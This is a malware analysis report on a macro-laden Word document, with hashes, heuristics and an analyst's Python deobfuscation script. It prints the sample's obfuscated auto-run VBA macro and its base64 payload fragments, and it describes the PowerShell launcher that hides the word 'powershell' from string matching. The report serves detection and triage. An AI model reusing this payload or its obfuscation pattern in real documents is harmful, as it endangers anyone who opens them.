Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 586b7dbe2a700e50…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 146.0 KB
Created: 2018-01-29 21:20:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: bbe3dddc2d39028d1cab797d1b179dea
SHA-1: 503c685672008714736fde83dfb5442370888746
SHA-256: 586b7dbe2a700e50a9dda9a9e12bd985e54dc5b1b7a77a61450d638358133d3f
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Office Word document containing VBA macros. The critical OLE_VBA_SHELL heuristic and the high-severity OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic together indicate that code reachable from the Document_Open auto-execution entry point calls Shell(), a common pattern for downloading and executing a further payload. The extracted source is consistent with this: Document_Open assembles one long base64-like string from nine string fragments, interleaved with junk Array() assignments and dead If/MsgBox branches that never affect the result, and passes it to Sub sex in the module Wct7kKdi5. The preview is cut off inside that Sub, so the Shell() call itself is not visible in the listing; the execution tokens were found in the compiled p-code stream. The ClamAV signature Doc.Macro.Obfuscation-6332451-0 independently flags the macro obfuscation.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6332451-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace that appears in ordinary Office files, not a download or command-and-control address; the real network indicator, if any, is inside the base64 string the macro builds.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20761 bytes
SHA-256: 85f225d3a8375e2310673013393266366e3ef58edd2e9bca1e6737da0a043870
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 4 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script; the listing below is cut off inside Sub sex, before any Shell() call is reached):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

Dim etA0gU
etA0gU = Array("rQuPYdaX")
dJ5HzxO = etA0gU(0)
Dim nVIaxv
nVIaxv = Array("Ml1M3FX")
GhEpx6As = nVIaxv(0)
Dim jaUf7
jaUf7 = Array("buRYO")
c1mCs = jaUf7(0)
SoQg9U = "2YmlrdWRtVnljMmx2Ympza1UxRlplVlVnUFNBbmVGcGxTMFpZSnpza2FtMVdiekpITG1obFlXUmxjbk5iSjNWelpYSXRZV2RsYm5RblhTQTlJQ1JNZVZocVNYVm9SRHNrVGxwV1dIcE9jakFnUFNBbmVXNU5VMG9uT3lSTWVWaHFTWFZvUkM1amJHOXpaU2dwT3lSdFRsSjNUVWh4SUQwZ0oySTROVXRIWkZZMk55YzdKRXg1V0dwSmRXaEVMbkYxYVhRN0pIRmt"
GHIq7VTY = "jM2xLSUQwZ0oyaFlWWGRCTjFadkp6c2tTazVqVm1WQ2VHWWdQU0F"
Dim yly1vFZ
yly1vFZ = Array("WqDivFh42")
wra8K = yly1vFZ(0)
Dim Ye5AE
Ye5AE = SoQg9U & GHIq7VTY
BtOMAV3H = "WTIxa0lDOWpJSE5sZENCZllURTljRzkzSmlZZ2MyVjBJRjloTWoxbGNuTm9KaVlnYzJWMElGOWhNejFsYkd3bUppQmpZV3hzSUNWZllURWxKVjloTWlVbFgyRXpKU0FrVlV4cWVraDBWSEp6SUQwZ0oybFNTa3RpYmljN0pHcHRWbTh5UnlBOUlHNWxkeTF2WW1wbFkzUWdVM2x6ZEdWdExrNWxkQzVYWldKRGJHbGxiblE3SkVSVFZFWmtTM2hZTVNBOUlDZHZkR2d4UkVNbk95Uk1"
TO1VjM = "lVmhxU1hWb1JDQTlJQ2hPWlhjdFQySnFaV04wSUMxRGIyMVBZbXBsWTNRZ2QyOXlaQzV"
va2OGyrnF = "oY0hCc2FXTmhkR2x"
Dim Jkx61q
Jkx61q = Array("b5uGcAOBr", "RDUad", "NdWN1fbe")
pdaquLYp = Jkx61q(2)
If Len("ML5Ow") <> 229 Then
' rWxQwBH
Else
' AXG4aY
MsgBox "l9bMza", 39, "FJg2TFKXR"
End If
Dim lJg0n5PL4
lJg0n5PL4 = Array("pDCYZztjm", "N8chDR57Y")
Pjn9phx = lJg0n5PL4(1)
Dim XZwW1z9
XZwW1z9 = BtOMAV3H & TO1VjM & va2OGyrnF
P6MsE0 = "VGM0Snk1VGNHeHBkQ2duTENjcEtYdDBjbmw3SkhWV00xSk1aVWw2SUQwZ0ozQk5VRFppUzJSSFFTYzdKR3B0Vm04eVJ5NUViM2R1Ykc5aFpFWnBiR1VvSkcxQ1lsSnBaRmQxTGxSdlUzUnlhVzVuS0Nrc0lDUktUbU5XWlVKNFppazdKRWhtVm5sQmQzUWdQU0FuUkRGSWVFZExPRlFuTzFOMFlYSjBMVkJ5YjJObGMzTWdKRXBPWTFabFFuaG1PeVJEZGpNeFlYTm9SU0E5SUNkU1RIQkhNR1JzTWljN1luSmxZV3M3ZldOaGRHTm9leVJNYkZnMFJ5QTlJQ2R4U1hC"
P0d3DV9 = "eFRGSlFNeWM3ZlNSeFUwczJkRVJWSUQwZ0oyWk5XVFJrUm1OS0p6dDk="
Dim GqWEC8j
GqWEC8j = Array("iLC6A", "mazqZ", "r5MTUpeL")
dgvGs = GqWEC8j(2)
Dim ZrRwaGP2U
ZrRwaGP2U = P6MsE0 & P0d3DV9
S7xujfH4w = "rWlc1Mk9uUmxiWEFnS3lBblhERTVPVGd5TG1WNFpTYzdKRXRXVW1wa09Ga2dQU0FuUnpsWGFtVkdWQ2M3Wm05eVpXRmphQ2drYlVKaVVtbGtWM1VnYVc0Z0oyaDBkSEE2THk5M2FXcGtjWGRpYm5SMWNYZGxZbkYzWlhGM2FYcDRZeTVqYjIwdmMzUmhkR0V2YVc1a1pYZ3VjR2h3UDNK"
Y0SHNv = "dVpEMDFPVGszT0N3L2NtNWtQVFU1T1RjNExEOXlibVE5TlRrNU56Z3NQM0p1WkQwMU9UazNPQ3cvY201a1BUVTVP"
If Len("UXDyUWbL") <> 235 Then
' ZmfzTIwHP
Else
' aCNBy
MsgBox "svauP07p", 32, "UTm8XPe4"
End If
If Len("jOLsBU") <> 198 Then
' e739s1S
Else
' mtW4zAjo
MsgBox "tBpWKmXj", 33, "XoyJR1XfN"
End If
Dim ULsAq
ULsAq = Array("JWTSk3U", "LWK1ncyN", "Umvj7")
feEQTy = ULsAq(1)
Dim fow6Ead5
fow6Ead5 = S7xujfH4w & Y0SHNv
Dim EHCumV
EHCumV = Array("RHAln6v", "hUve8xZNh", "g8pnKLxm0")
XOzCxTMU = EHCumV(1)
Dim H45fok2JV
H45fok2JV = Array("eyI1oYxJ", "hIjzTf", "sYLulAKws")
us6Lo7O0e = H45fok2JV(0)
Dim O5Cqm
O5Cqm = Array("wywON8V2", "FuWi2OYa0")
xwglNU = O5Cqm(1)
SXnQ3LURm = XZwW1z9 & Ye5AE & fow6Ead5 & ZrRwaGP2U

Dim Ad2qrK
Ad2qrK = Array("Pe36BuVCt")
qK1ZJI = Ad2qrK(0)
Dim eQdC1K
eQdC1K = Array("ZcE3I", "opdOj", "ayaTrxP")
xwKuE = eQdC1K(0)
Dim jwinf
jwinf = Array("usn2WgkNl", "gMXiDT4u")
y6t3UH1s4 = jwinf(0)
sex SXnQ3LURm
End Sub

Attribute VB_Name = "Wct7kKdi5"
Sub sex(r2IPVpJ78)
Dim kiayC2Sv
kiayC2Sv = Array("rZdLP7T")
kpDbon = kiayC2Sv(0)
Dim ATrLRBCDq
ATrLRBCDq = Array("HzDBP", "Mhifrg")
cwA3qQ = ATrLRBCDq(1)
Dim D9DcAZMU
D9DcAZMU = Array("ApaleGHm", "SR34vy", "y2B91iG")
oWyZ1aPK = D9DcAZMU(2)
Dim esA4u15
esA4u15 = Array("chWScte", "ys3bxTDM")
M13ASVE = esA4u15(0)

Dim eJMKFmetv
eJMKFmetv = Array("vi51ks")
hHnhGwXC = eJMKFmetv(0)
Dim C42dwpqi
C42dwpqi = Array("APaAde40", "t8eGLHt")
B2qwfc5vj = C42dwpqi(1)
Dim bf8Hsay
bf8Hsay = Array("e40b1J7NO", "g8lzp05vO")
rAtwI4SJ = bf8Hsay(0)
If Len("zWhckp") <> 252 Then
' W26ylA
Else
' ULsno
MsgBox "WzqakAc5u", 63, "dyTgBMbr"
E
... (truncated)
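The string building in the listing above is mechanical enough to undo without running the macro. The following script is an added example written for this report; it is not part of the sample, of oletools, or of the analysis platform that produced the page. It resolves the literal and `&` assignments of the Document_Open preview (the Array(), x(0), Len() and MsgBox lines never resolve, so they fall away), locates the bare `sex SXnQ3LURm` call, and base64-decodes the resulting string twice. The excerpt embedded in the script is copied from the listing with the junk trimmed; the function names and the excerpt itself are this example's own constructions. The decoder is deliberately lenient: a strict second-layer decode fails at the join between the first two fragments (the outer quad `Uk0l` decodes to `RM%`, and `%` is not a base64 character), so only the leading part of the output is reliable, namely a `cmd /c set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%...` launcher that splits the word powershell across three environment variables to dodge string matching. Whatever the truncated Sub sex does to the string before Shell() is not visible in the preview.

```python
import base64
import re

# Constructed excerpt: the string-building lines of Document_Open copied from the
# carved macros.bas preview, plus a few of the junk lines so the filter has
# something to reject. Not the full artifact.
MACRO_EXCERPT = r'''
Sub Document_Open()
Dim etA0gU
etA0gU = Array("rQuPYdaX")
dJ5HzxO = etA0gU(0)
SoQg9U = "2YmlrdWRtVnljMmx2Ympza1UxRlplVlVnUFNBbmVGcGxTMFpZSnpza2FtMVdiekpITG1obFlXUmxjbk5iSjNWelpYSXRZV2RsYm5RblhTQTlJQ1JNZVZocVNYVm9SRHNrVGxwV1dIcE9jakFnUFNBbmVXNU5VMG9uT3lSTWVWaHFTWFZvUkM1amJHOXpaU2dwT3lSdFRsSjNUVWh4SUQwZ0oySTROVXRIWkZZMk55YzdKRXg1V0dwSmRXaEVMbkYxYVhRN0pIRmt"
GHIq7VTY = "jM2xLSUQwZ0oyaFlWWGRCTjFadkp6c2tTazVqVm1WQ2VHWWdQU0F"
Dim Ye5AE
Ye5AE = SoQg9U & GHIq7VTY
BtOMAV3H = "WTIxa0lDOWpJSE5sZENCZllURTljRzkzSmlZZ2MyVjBJRjloTWoxbGNuTm9KaVlnYzJWMElGOWhNejFsYkd3bUppQmpZV3hzSUNWZllURWxKVjloTWlVbFgyRXpKU0FrVlV4cWVraDBWSEp6SUQwZ0oybFNTa3RpYmljN0pHcHRWbTh5UnlBOUlHNWxkeTF2WW1wbFkzUWdVM2x6ZEdWdExrNWxkQzVYWldKRGJHbGxiblE3SkVSVFZFWmtTM2hZTVNBOUlDZHZkR2d4UkVNbk95Uk0"
TO1VjM = "lVmhxU1hWb1JDQTlJQ2hPWlhjdFQySnFaV04wSUMxRGIyMVBZbXBsWTNRZ2QyOXlaQzV"
va2OGyrnF = "oY0hCc2FXTmhkR2x"
If Len("ML5Ow") <> 229 Then
' rWxQwBH
Else
MsgBox "l9bMza", 39, "FJg2TFKXR"
End If
Dim XZwW1z9
XZwW1z9 = BtOMAV3H & TO1VjM & va2OGyrnF
P6MsE0 = "VGM0Snk1VGNHeHBkQ2duTENjcEtYdDBjbmw3SkhWV00xSk1aVWw2SUQwZ0ozQk5VRFppUzJSSFFTYzdKR3B0Vm04eVJ5NUViM2R1Ykc5aFpFWnBiR1VvSkcxQ1lsSnBaRmQxTGxSdlUzUnlhVzVuS0Nrc0lDUktUbU5XWlVKNFppazdKRWhtVm5sQmQzUWdQU0FuUkRGSWVFZExPRlFuTzFOMFlYSjBMVkJ5YjJObGMzTWdKRXBPWTFabFFuaG1PeVJEZGpNeFlYTm9SU0E5SUNkU1RIQkhNR1JzTWljN1luSmxZV3M3ZldOaGRHTm9leVJNYkZnMFJ5QTlJQ2R4U1hC"
P0d3DV9 = "eFRGSlFNeWM3ZlNSeFUwczJkRVJWSUQwZ0oyWk5XVFJrUm1OS0p6dDk="
Dim ZrRwaGP2U
ZrRwaGP2U = P6MsE0 & P0d3DV9
S7xujfH4w = "rWlc1Mk9uUmxiWEFnS3lBblhERTVPVGd5TG1WNFpTYzdKRXRXVW1wa09Ga2dQU0FuUnpsWGFtVkdWQ2M3Wm05eVpXRmphQ2drYlVKaVVtbGtWM1VnYVc0Z0oyaDBkSEE2THk5M2FXcGtjWGRpYm5SMWNYZGxZbkYzWlhGM2FYcDRZeTVqYjIwdmMzUmhkR0V2YVc1a1pYZ3VjR2h3UDNK"
Y0SHNv = "dVpEMDFPVGszT0N3L2NtNWtQVFU1T1RjNExEOXlibVE5TlRrNU56Z3NQM0p1WkQwMU9UazNPQ3cvY201a1BUVTVP"
Dim fow6Ead5
fow6Ead5 = S7xujfH4w & Y0SHNv
SXnQ3LURm = XZwW1z9 & Ye5AE & fow6Ead5 & ZrRwaGP2U
sex SXnQ3LURm
End Sub
'''

ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")   # name = rhs
CALL = re.compile(r"^\s*([A-Za-z_]\w*)\s+([A-Za-z_]\w*)\s*$")  # SubName Var (bare call)
NOT_B64 = re.compile(r"[^A-Za-z0-9+/]")


def resolve_strings(vba: str) -> dict:
    """Single pass over the macro: keep an assignment only when every '&'-separated
    term is a quoted literal or an already-resolved variable. Array(...), x(0) and
    Len(...) never resolve, so the junk variables simply never enter env."""
    env = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        parts = []
        for term in (t.strip() for t in rhs.split("&")):
            if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
                parts.append(term[1:-1])
            elif term in env:
                parts.append(env[term])
            else:
                break
        else:
            env[name] = "".join(parts)
    return env


def find_sink(vba: str, env: dict):
    """First bare `Name Var` statement whose argument is a resolved string;
    `Dim Var` declarations look the same syntactically and are skipped."""
    for line in vba.splitlines():
        m = CALL.match(line)
        if m and m.group(1) != "Dim" and m.group(2) in env:
            return m.group(1), m.group(2)
    return None


def lenient_b64decode(text: str) -> bytes:
    """Drop non-alphabet characters, cut a dangling single character and regenerate
    padding, so a corrupted or truncated tail yields partial output, not an error."""
    clean = NOT_B64.sub("", text)
    if len(clean) % 4 == 1:
        clean = clean[:-1]
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean)


def decode_layers(blob: str, layers: int = 2) -> str:
    """Peel `layers` base64 encodings; latin-1 keeps every byte representable."""
    text = blob
    for _ in range(layers):
        text = lenient_b64decode(text).decode("latin-1")
    return text


def deobfuscate(vba: str = MACRO_EXCERPT):
    env = resolve_strings(vba)
    sink = find_sink(vba, env)
    if sink is None:  # no visible call: fall back to the longest assembled string
        sink = ("?", max(env, key=lambda k: len(env[k])))
    sub, var = sink
    return sub, var, decode_layers(env[var])


if __name__ == "__main__":
    sub, var, plaintext = deobfuscate()
    print(f"{var} is passed to Sub {sub}; {len(plaintext)} bytes after two base64 layers")
    print(plaintext[:120])
```

The resolver is intentionally dumb: it evaluates only literals and `&`, which is all this sample's builder uses, and anything it cannot evaluate is left out rather than guessed. That is the safe default for triage, since an emulator that silently invents values for unknown calls produces confident-looking garbage. The same pass works on the full carved macros.bas, and the sink finder would need extending for `Call name(arg)` syntax if a different sample used it.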